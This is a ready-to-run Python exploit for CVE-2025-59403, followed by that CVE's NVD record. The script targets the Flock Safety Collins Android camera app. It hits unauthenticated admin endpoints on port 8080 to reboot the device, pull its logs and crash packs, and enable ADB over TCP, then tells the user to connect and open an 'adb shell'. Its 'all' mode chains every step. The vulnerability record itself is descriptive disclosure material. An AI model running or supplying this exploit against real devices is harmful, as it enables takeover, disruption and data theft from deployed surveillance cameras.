CVE-2025-59403

#!/usr/bin/env python3 # CVE-2025-59403 - Flock Safety Collins Unauthenticated API Exploit # Exploits missing authentication on administrative API endpoints # running on port 8080 of the Collins Android application import requests import sys import argparse TARGET_PORT = 8080 def exploit_reboot(target_ip): """Trigger device reboot via unauthenticated /reboot endpoint (DoS)""" url = f"http://{target_ip}:{TARGET_PORT}/reboot" print(f"[*] Sending reboot command to {url}") try: resp = requests.post(url, timeout=5) print(f"[+] Reboot triggered - Status: {resp.status_code}") except Exception as e: print(f"[-] Error: {e}") def exploit_logs(target_ip): """Retrieve device logs via unauthenticated /logs endpoint (Info Disclosure)""" url = f"http://{target_ip}:{TARGET_PORT}/logs" print(f"[*] Fetching logs from {url}") try: resp = requests.get(url, timeout=10) print(f"[+] Logs retrieved - Status: {resp.status_code}") print(resp.text[:2000]) except Exception as e: print(f"[-] Error: {e}") def exploit_adb_enable(target_ip): """Enable ADB over TCP via unauthenticated /adb/enable endpoint (RCE)""" url = f"http://{target_ip}:{TARGET_PORT}/adb/enable" print(f"[*] Enabling ADB over TCP on {url}") try: resp = requests.post(url, timeout=5) print(f"[+] ADB enable triggered - Status: {resp.status_code}") print(f"[*] Now run: adb connect {target_ip}:5555") print(f"[*] Then: adb shell") except Exception as e: print(f"[-] Error: {e}") def exploit_crashpack(target_ip): """Retrieve crash logs via unauthenticated /crashpack endpoint""" url = f"http://{target_ip}:{TARGET_PORT}/crashpack" print(f"[*] Fetching crashpack from {url}") try: resp = requests.get(url, timeout=10) print(f"[+] Crashpack retrieved - Status: {resp.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-59403 Exploit") parser.add_argument("target", help="Target device IP address") parser.add_argument("--mode", choices=["reboot", "logs", "adb", "crashpack", "all"], default="adb", help="Exploit mode") args = parser.parse_args() if args.mode == "reboot": exploit_reboot(args.target) elif args.mode == "logs": exploit_logs(args.target) elif args.mode == "adb": exploit_adb_enable(args.target) elif args.mode == "crashpack": exploit_crashpack(args.target) elif args.mode == "all": exploit_adb_enable(args.target) exploit_logs(args.target) exploit_crashpack(args.target) exploit_reboot(args.target)

{"cve": {"id": "CVE-2025-59403", "sourceIdentifier": "[email protected]", "published": "2025-10-02T17:16:05.530", "lastModified": "2025-11-24T15:15:48.800", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Flock Safety Android Collins application (aka com.flocksafety.android.collins) 6.35.31 for Android lacks authentication. It is responsible for the camera feed on Falcon, Sparrow, and Bravo devices, but exposes administrative API endpoints on port 8080 without authentication. Endpoints include but are not limited to: /reboot, /logs, /crashpack, and /adb/enable. This results in multiple impacts including denial of service (DoS) via /reboot, information disclosure via /logs, and remote code execution (RCE) via /adb/enable. The latter specifically results in adb being started over TCP without debugging confirmation, providing an attacker in the LAN/WLAN with shell access."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-749"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flocksafety:flock_safety:6.35.31:*:*:*:*:android:*:*", "matchCriteriaId": "F724C2F3-8820-4EEA-9AB2-9CFA8AD32A35"}]}]}], "references": [{"url": "https://gainsec.com/2025/09/27/fly-by-device-2-the-falcon-sparrow-gated-wireless-rce-camera-feed-dos-information-disclosure-and-more/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gainsec.com/wp-content/uploads/2025/09/Root-from-the-Coop-Device-3_-Root-Shell-on-Flock-Safetys-Bravo-Compute-Box-GainSec.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.flocksafety.com/products", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.flocksafety.com/products/license-plate-readers", "source": "[email protected]", "tags": ["Product"]}]}}